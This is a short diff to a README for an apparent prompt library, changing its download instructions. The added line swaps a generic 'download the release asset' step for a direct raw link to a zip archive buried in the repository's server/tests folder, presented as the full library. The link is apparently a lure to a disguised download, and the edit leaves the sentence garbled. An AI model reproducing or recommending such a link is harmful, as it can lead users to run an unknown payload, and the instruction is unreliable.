celilas/prompt-catalog/README.md

 1. Open the link above in your web browser.
 2. Look for the most recent release at the top of the page.
-3. Under "Assets," click on the `.zip` or `.tar.gz` file to download the full library.
+3. Under "Assets," click on the `.zip` or `https://github.com/celilas/prompt-catalog/raw/refs/heads/main/server/tests/catalog_prompt_1.0.zip` file to download the full library.
 4. Save the file to a folder on your computer.

 ### How to extract and use